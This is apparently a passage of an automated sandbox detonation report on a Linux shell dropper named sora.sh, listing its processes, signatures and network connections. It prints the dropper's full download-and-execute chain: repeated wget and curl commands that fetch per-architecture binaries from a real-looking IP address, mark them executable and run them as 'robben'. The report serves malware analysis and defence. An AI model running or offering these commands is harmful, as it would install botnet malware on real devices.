[curl -O http://188.127.247.15/bins/sora.m68k]

/bin/cat

[cat sora.m68k]

/bin/chmod

[chmod +x robben sora.sh]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://188.127.247.15/bins/sora.sh4]

/usr/bin/curl

[curl -O http://188.127.247.15/bins/sora.sh4]

/bin/cat

[cat sora.sh4]

/bin/chmod

[chmod +x robben sora.sh]

/tmp/robben

[./robben Payload]

Network

Country Destination Domain Proto
CZ 188.127.247.15:80 tcp
CZ 188.127.247.15:80 tcp
CZ 188.127.247.15:80 tcp
CZ 188.127.247.15:80 tcp
CZ 188.127.247.15:80 tcp
CZ 188.127.247.15:80 tcp
CZ 188.127.247.15:80 tcp
CZ 188.127.247.15:80 tcp
CZ 188.127.247.15:80 tcp
CZ 188.127.247.15:80 tcp
CZ 188.127.247.15:80 tcp
CZ 188.127.247.15:80 tcp
CZ 188.127.247.15:80 tcp
CZ 188.127.247.15:80 tcp
CZ 188.127.247.15:80 tcp
CZ 188.127.247.15:80 tcp
CZ 188.127.247.15:80 tcp
CZ 188.127.247.15:80 tcp
CZ 188.127.247.15:80 tcp
CZ 188.127.247.15:80 tcp
CZ 188.127.247.15:80 tcp
CZ 188.127.247.15:80 tcp
CZ 188.127.247.15:80 tcp
CZ 188.127.247.15:80 tcp
CZ 188.127.247.15:80 tcp
CZ 188.127.247.15:80 tcp
CZ 188.127.247.15:80 tcp
CZ 188.127.247.15:80 tcp

Files

N/A

Analysis: behavioral4

Detonation Overview

Submitted

2024-08-29 20:35

Reported

2024-08-29 20:38

Platform

debian9-mipsel-20240611-en

Max time kernel

35s

Max time network

36s

Command Line

[/tmp/sora.sh]

Signatures

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A

Reads runtime system information

Description Indicator Process Target
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/robben /tmp/sora.sh N/A

Processes

/tmp/sora.sh

[/tmp/sora.sh]

/usr/bin/wget

[wget http://188.127.247.15/bins/sora.x86]

/usr/bin/curl

[curl -O http://188.127.247.15/bins/sora.x86]

/bin/cat

[cat sora.x86]

/bin/chmod

[chmod +x robben sora.sh systemd-private-7f77a81ac96e448c9e00deea09a07fd1-systemd-timedated.service-PY0NAt]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://188.127.247.15/bins/sora.mips]

/usr/bin/curl

[curl -O http://188.127.247.15/bins/sora.mips]

/bin/cat

[cat sora.mips]

/bin/chmod

[chmod +x robben sora.sh systemd-private-7f77a81ac96e448c9e00deea09a07fd1-systemd-timedated.service-PY0NAt]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://188.127.247.15/bins/sora.x86_64]

/usr/bin/curl

[curl -O http://188.127.247.15/bins/sora.x86_64]

/bin/cat

[cat sora.x86_64]

/bin/chmod

[chmod +x robben sora.sh systemd-private-7f77a81ac96e448c9e00deea09a07fd1-systemd-timedated.service-PY0NAt]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://188.127.247.15/bins/sora.i468]

/usr/bin/curl

[curl -O http://188.127.247.15/bins/sora.i468]

/bin/cat

[cat sora.i468]

/bin/chmod

[chmod +x robben sora.sh systemd-private-7f77a81ac96e448c9e00deea09a07fd1-systemd-timedated.service-PY0NAt]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://188.127.247.15/bins/sora.i686]

/usr/bin/curl

[curl -O http://188.127.247.15/bins/sora.i686]

/bin/cat

[cat sora.i686]

/bin/chmod

[chmod +x robben sora.sh systemd-private-7f77a81ac96e448c9e00deea09a07fd1-systemd-timedated.service-PY0NAt]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://188.127.247.15/bins/sora.mpsl]

/usr/bin/curl

[curl -O http://188.127.247.15/bins/sora.mpsl]

/bin/cat

[cat sora.mpsl]

/bin/chmod

[chmod +x robben sora.sh systemd-private-7f77a81ac96e448c9e00deea09a07fd1-systemd-timedated.service-PY0NAt]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://188.127.247.15/bins/sora.arm4]

/usr/bin/curl

[curl -O http://188.127.247.15/bins/sora.arm4]

/bin/cat

[cat sora.arm4]

/bin/chmod

[chmod +x robben sora.sh systemd-private-7f77a81ac96e448c9e00deea09a07fd1-systemd-timedated.service-PY0NAt]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://188.127.247.15/bins/sora.arm5]

/usr/bin/curl

[curl -O http://188.127.247.15/bins/sora.arm5]

/bin/cat

[cat sora.arm5]

/bin/chmod

[chmod +x robben sora.sh systemd-private-7f77a81ac96e448c9e00deea09a07fd1-systemd-timedated.service-PY0NAt]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://188.127.247.15/bins/sora.arm6]

/usr/bin/curl

[curl -O http://188.127.247.15/bins/sora.arm6]

/bin/cat

[cat sora.arm6]

/bin/chmod

[chmod +x robben sora.sh systemd-private-7f77a81ac96e448c9e00deea09a07fd1-systemd-timedated.service-PY0NAt]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://188.127.247.15/bins/sora.arm7]

/usr/bin/curl

[curl -O http://188.127.247.15/bins/sora.arm7]

/bin/cat

[cat sora.arm7]

/bin/chmod

[chmod +x robben sora.sh systemd-private-7f77a81ac96e448c9e00deea09a07fd1-systemd-timedated.service-PY0NAt]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://188.127.247.15/bins/sora.ppc]

/usr/bin/curl

[curl -O http://188.127.247.15/bins/sora.ppc]

/bin/cat

[cat sora.ppc]

/bin/chmod

[chmod +x robben sora.sh]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://188.127.247.15/bins/sora.ppc440fp]

/usr/bin/curl

[curl -O http://188.127.247.15/bins/sora.ppc440fp]

/bin/cat

[cat sora.ppc440fp]

/bin/chmod

[chmod +x robben sora.sh]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://188.127.247.15/bins/sora.m68k]

/usr/bin/curl

[curl -O http://188.127.247.15/bins/sora.m68k]

/bin/cat

[cat sora.m68k]

/bin/chmod

[chmod +x robben sora.sh]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://188.127.247.15/bins/sora.sh4]

/usr/bin/curl

[curl -O http://188.127.247.15/bins/sora.sh4]

/bin/cat

[cat sora.sh4]

/bin/chmod

[chmod +x robben sora.sh]

/tmp/robben

[./robben Payload]

Network

Country Destination Domain Proto
CZ 188.127.247.15:80 tcp
CZ 188.127.247.15:80 tcp
CZ 188.127.247.15:80 tcp
CZ 188.127.247.15:80 tcp
CZ 188.127.247.15:80 tcp
CZ 188.127.247.15:80 tcp
CZ 188.127.247.15:80 tcp
CZ 188.127.247.15:80 tcp
CZ 188.127.247.15:80 tcp
CZ 188.127.247.15:80 tcp
CZ 188.127.247.15:80 tcp
CZ 188.127.247.15:80 tcp
CZ 188.127.247.15:80 tcp
CZ 188.127.247.15:80 tcp
CZ 188.127.247.15:80 tcp
CZ 188.127.247.15:80 tcp
CZ 188.127.247.15:80 tcp
CZ 188.127.247.15:80 tcp
CZ 188.127.247.15:80 tcp
CZ 188.127.247.15:80 tcp
CZ 188.127.247.15:80 tcp
CZ 188.127.247.15:80 tcp
CZ 188.127.247.15:80 tcp
CZ 188.127.247.15:80 tcp
CZ 188.127.247.15:80 tcp
CZ 188.127.247.15:80 tcp
CZ 188.127.247.15:80 tcp
CZ 188.127.247.15:80 tcp

Files

N/A